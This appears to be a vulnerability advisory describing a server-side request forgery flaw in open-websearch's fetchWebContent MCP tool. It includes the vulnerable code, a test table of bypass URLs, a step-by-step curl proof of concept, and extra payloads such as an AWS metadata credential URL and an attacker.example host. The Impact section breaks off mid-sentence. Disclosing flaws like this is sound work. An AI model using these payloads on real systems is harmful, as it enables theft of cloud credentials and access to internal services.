Server-side request forgery (SSRF) in open-websearch

Description

open-websearch has SSRF in the fetchWebContent MCP tool: bracketed IPv6 literals and a non-resolving hostname check bypass isPrivateOrLocalHostname

### Summary

src/utils/urlSafety.ts exposes isPublicHttpUrl / assertPublicHttpUrl, which gate the MCP fetchWebContent tool against private-network targets. The check has two defects that together allow non-blind SSRF, with the response body returned to the caller:

1. Bracketed IPv6 literals are never recognized. Node's WHATWG URL.hostname keeps the surrounding […] for IPv6 literals. isIP("[::1]") returns 0 (not 6), so neither isPrivateIpv4 nor isPrivateIpv6 is ever called on an IPv6 literal input. This includes [::1] itself and every IPv4-mapped form such as [::ffff:7f00:1] (= 127.0.0.1 via the IPv4 stack).
2. No DNS resolution. isPrivateOrLocalHostname only inspects the literal hostname string and never resolves the host to an IP. Any attacker-controlled hostname whose DNS record points at 127.0.0.1 (or any RFC1918 / link-local address) passes the check unchanged; axios then performs its own resolution and connects to the private address.

The isPrivateIpv6 implementation also has the hex bypass (it would miss ::ffff:7f00:1 even if reached), but defect (1) lets every bracketed IPv6 literal slip past before that branch is even entered.

The fetchWebContent tool returns the response body (JSON.stringify(result)) to the MCP caller, so the SSRF is non-blind.

### Details

Vulnerable function (src/utils/urlSafety.ts:95-119):

```ts
export function isPrivateOrLocalHostname(hostname: string): boolean {
  const host = hostname.trim().toLowerCase();
  if (!host) return true;
  if (host === 'localhost' || host.endsWith('.localhost')) return true;
  if (host === 'metadata.google.internal' || host === 'metadata.azure.internal') return true;
  const integerIp = parseIntegerIpv4Literal(host);
  if (integerIp && isPrivateIpv4(integerIp)) return true;
  if (isPrivateOrLocalIp(host)) return true; // only runs if isIP(host) ∈ {4, 6}
  return false;
}
```

isPrivateOrLocalIp (src/utils/urlSafety.ts:84-93):

```ts
function isPrivateOrLocalIp(ip: string): boolean {
  const version = isIP(ip); // returns 0 for "[::1]", "[::ffff:7f00:1]", any bracketed literal
  if (version === 4) return isPrivateIpv4(ip);
  if (version === 6) return isPrivateIpv6(ip);
  return false;
}
```
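The isIP behaviour noted in the comment above can be checked in isolation. The following is a minimal sketch using only Node built-ins; stripBrackets is a hypothetical helper introduced for illustration and is not part of the project.

```typescript
import { isIP } from "node:net";

// Hostnames exactly as the WHATWG URL parser reports them.
const bracketed = new URL("http://[::1]/").hostname;
const mapped = new URL("http://[::ffff:127.0.0.1]/").hostname;

// Hypothetical helper (not in the project): drop one pair of surrounding brackets.
function stripBrackets(hostname: string): string {
  return hostname.startsWith("[") && hostname.endsWith("]")
    ? hostname.slice(1, -1)
    : hostname;
}

console.log(bracketed, isIP(bracketed)); // [::1] 0
console.log(mapped, isIP(mapped)); // [::ffff:7f00:1] 0
console.log(isIP(stripBrackets(bracketed))); // 6
console.log(isIP(stripBrackets(mapped))); // 6
```

Stripping the brackets only makes the literal visible to isIP; whether the address is then classified as private still depends on isPrivateIpv6 handling the hex form.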

Caller — src/tools/setupTools.ts:252-286 (fetchWebContent tool):

```ts
server.tool(
  fetchWebToolName, // default: "fetchWebContent"
  "Fetch content from a public HTTP(S) URL ...",
  {
    url: z.string().url().refine(
      (url) => validatePublicWebUrl(url), // → isPublicHttpUrl → isPrivateOrLocalHostname
      "URL must be a public HTTP(S) address ..."
    ),
    /* … */
  },
  async ({url, maxChars}) => {
    const result = await runtime.services.fetchWeb.execute({
      url, maxChars, /* … */
    });
    return { content: [{ type: 'text', text: JSON.stringify(result, null, 2) }] };
  }
);
```

Service — src/engines/web/fetchWebContent.ts:313-375: re-validates via assertPublicHttpUrl (same broken check), then calls axios.head + axios.get on the raw URL and returns response.data and response.headers to the caller.
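Because the service hands the raw URL to axios after a string-only check, defect (2) would remain even if bracketed literals were handled. One possible shape for a resolution-aware check is sketched below. It is not the project's code: blocked, isBlockedAddress and resolvesToPublicOnly are hypothetical names, the subnet list is an illustrative subset, and the sketch assumes Node's net.BlockList and dns/promises lookup.

```typescript
import { BlockList, isIP } from "node:net";
import { lookup } from "node:dns/promises";

// Illustrative subset of non-public ranges; a real deny-list would be longer.
const blocked = new BlockList();
blocked.addSubnet("0.0.0.0", 8, "ipv4");
blocked.addSubnet("127.0.0.0", 8, "ipv4"); // loopback
blocked.addSubnet("10.0.0.0", 8, "ipv4"); // RFC1918
blocked.addSubnet("172.16.0.0", 12, "ipv4"); // RFC1918
blocked.addSubnet("192.168.0.0", 16, "ipv4"); // RFC1918
blocked.addSubnet("169.254.0.0", 16, "ipv4"); // link-local, cloud metadata
blocked.addAddress("::", "ipv6"); // unspecified
blocked.addAddress("::1", "ipv6"); // loopback
blocked.addSubnet("fc00::", 7, "ipv6"); // unique local
blocked.addSubnet("fe80::", 10, "ipv6"); // link-local

// Hypothetical helper: true when the address must not be fetched.
function isBlockedAddress(address: string): boolean {
  const family = isIP(address);
  if (family === 0) return true; // not an IP literal: fail closed
  return blocked.check(address, family === 6 ? "ipv6" : "ipv4");
}

// Hypothetical helper: resolve the host and require every answer to be public.
async function resolvesToPublicOnly(hostname: string): Promise<boolean> {
  const host = hostname.replace(/^\[|\]$/g, ""); // URL.hostname keeps IPv6 brackets
  const answers: { address: string }[] = isIP(host)
    ? [{ address: host }]
    : await lookup(host, { all: true });
  return answers.length > 0 && answers.every((a) => !isBlockedAddress(a.address));
}
```

Node's documentation states that BlockList.check accepts IPv6 notation for IPv4 addresses, which should cover IPv4-mapped forms, but that behaviour is worth verifying on the Node version in use. A pre-flight check like this is also still open to DNS rebinding if the HTTP client resolves the name again, so the validated address would need to be pinned for the actual connection.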

Transport (src/index.ts:85-253): when config.enableHttpServer is true (a documented configuration, enabled by the Docker image), the MCP server binds on 0.0.0.0:${PORT} (default 3000) with CORS origin: '*' and no authentication on /mcp (Streamable HTTP) or /sse (legacy SSE). Anyone who can reach the port can invoke any tool.

Verification of the validator (run against current HEAD)

I executed the real isPublicHttpUrl / assertPublicHttpUrl from src/utils/urlSafety.ts under tsx against a set of inputs:

| Input URL | parsed.hostname | isPublicHttpUrl | assertPublicHttpUrl |
| --- | --- | --- | --- |
| http://[::ffff:7f00:1]/ (127.0.0.1) | [::ffff:7f00:1] | true ← bypass | PASSED ← bypass |
| http://[::ffff:a9fe:1]/ (169.254.0.1) | [::ffff:a9fe:1] | true ← bypass | PASSED ← bypass |
| http://[::ffff:a00:1]/ (10.0.0.1) | [::ffff:a00:1] | true ← bypass | PASSED ← bypass |
| http://[::ffff:127.0.0.1]/ | [::ffff:7f00:1] | true ← bypass | PASSED ← bypass |
| http://[0:0:0:0:0:0:0:1]/ | [::1] | true ← bypass | PASSED ← bypass |
| http://[::1]/ (plain loopback!) | [::1] | true ← bypass | PASSED ← bypass |
| http://127.0.0.1/ (control) | 127.0.0.1 | false (blocked) | threw (blocked) |
| http://localhost/ (control) | localhost | false (blocked) | threw (blocked) |

WHATWG new URL("http://[::ffff:127.0.0.1]/").hostname returns [::ffff:7f00:1] — note that Node's URL parser actively re-encodes the dotted form to hex, helping the bypass. Every bracketed IPv6 literal passes the validator.
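To make the hex re-encoding concrete, the sketch below decodes the IPv4 address embedded in the hostname that the URL parser returns. It is an illustration only: ipv4FromMappedIpv6 and embeddedIpv4 are hypothetical helpers, and the regular expression assumes the compressed ::ffff:HHHH:HHHH form seen in the table above.

```typescript
// Hypothetical helper: decode "::ffff:HHHH:HHHH" to dotted IPv4, or null if
// the input is not in that form.
function ipv4FromMappedIpv6(address: string): string | null {
  const match = /^::ffff:([0-9a-f]{1,4}):([0-9a-f]{1,4})$/i.exec(address);
  if (!match) return null;
  const high = parseInt(match[1], 16); // first two octets
  const low = parseInt(match[2], 16); // last two octets
  return [high >> 8, high & 0xff, low >> 8, low & 0xff].join(".");
}

// Hypothetical helper: parse a URL, strip the IPv6 brackets, decode the host.
function embeddedIpv4(url: string): string | null {
  const hostname = new URL(url).hostname;
  const bare =
    hostname.startsWith("[") && hostname.endsWith("]")
      ? hostname.slice(1, -1)
      : hostname;
  return ipv4FromMappedIpv6(bare);
}

console.log(embeddedIpv4("http://[::ffff:127.0.0.1]/")); // 127.0.0.1
console.log(embeddedIpv4("http://[::ffff:a9fe:1]/")); // 169.254.0.1
console.log(embeddedIpv4("http://[::1]/")); // null
```

A validator could run the decoded address through its existing IPv4 checks, so that the dotted and hex spellings of the same target are treated alike.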

Verification of the fetch (Node 22/25)

I bound a trivial HTTP server to 127.0.0.1:29999 and called axios.get("http://[::ffff:7f00:1]:29999/") from Node; the request reached the server:

```
HIT: / from 127.0.0.1 family IPv4
http://[::ffff:7f00:1]:29999/ -> 200 <html>internal content</html>
```

The OS routes ::ffff:X.X.X.X connections through the IPv4 stack, so the PoC works identically across macOS and Linux.

Environment: clean clone of Aas-ee/open-webSearch@HEAD, Node 22+.

1. Start the MCP HTTP server.

```bash
git clone https://github.com/Aas-ee/open-webSearch.git
cd open-webSearch
npm install && npm run build
MODE=http PORT=3000 node build/index.js &
```

2. Stand up a canary on loopback.

```bash
node -e '
require("http").createServer((q,r)=>{
  console.log("[canary]", q.method, q.url, "from", q.socket.remoteAddress);
  r.writeHead(200, {"content-type":"text/html"});
  r.end("INTERNAL-SECRET: canary-hit for " + q.url);
}).listen(19999, "127.0.0.1", () => console.log("canary on 127.0.0.1:19999"));
' &
```

3. Open an MCP session and call fetchWebContent with the bypass URL.

```bash
# Accept header must include both JSON and SSE for Streamable HTTP transport.
ACCEPT='application/json, text/event-stream'

# initialize → grab the mcp-session-id header
SID=$(curl -sSD - -o /dev/null -X POST http://127.0.0.1:3000/mcp \
  -H "Accept: $ACCEPT" -H 'Content-Type: application/json' \
  -d '{"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2025-03-26","capabilities":{},"clientInfo":{"name":"poc","version":"0"}}}' \
  | awk 'tolower($1)=="mcp-session-id:" { gsub(/\r/,""); print $2 }')

# notifications/initialized
curl -sS -X POST http://127.0.0.1:3000/mcp \
  -H "Accept: $ACCEPT" -H 'Content-Type: application/json' -H "mcp-session-id: $SID" \
  -d '{"jsonrpc":"2.0","method":"notifications/initialized","params":{}}' >/dev/null

# call fetchWebContent with the SSRF bypass URL
curl -sS -X POST http://127.0.0.1:3000/mcp \
  -H "Accept: $ACCEPT" -H 'Content-Type: application/json' -H "mcp-session-id: $SID" \
  -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{
    "name":"fetchWebContent",
    "arguments":{"url":"http://[::ffff:7f00:1]:19999/internal","maxChars":10000}
  }}'
```

Expected result: the canary logs [canary] GET /internal from 127.0.0.1, and the MCP response contains INTERNAL-SECRET: canary-hit for /internal in the tool's content[0].text.

Additional bypass vectors that work the same way:

- http://[::1]:<port>/: plain IPv6 loopback.
- http://[::ffff:a9fe:1]/latest/meta-data/iam/security-credentials/: AWS EC2 metadata over the IPv4 stack.
- http://attacker.example/ where attacker.example has A/AAAA records pointing at any private address: bypasses via defect (2), no IPv6 trick needed.

### Impact

- Cross-tenant SSRF with full response body. Any client that can speak MCP to the HTTP transport can fetch arbitrary private-network URLs and receive the response body. AWS EC2 metadata, internal dashboards, loopback services, and RFC1918 neighbours are all in scope.
- Pre-auth when enableHttpServer is set. No authentication layer exists on /mcp or /sse; CORS is *.
- DNS-rebinding / LAN-victim angle. Because /mcp is CORS * and accepts POST, a victim

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.
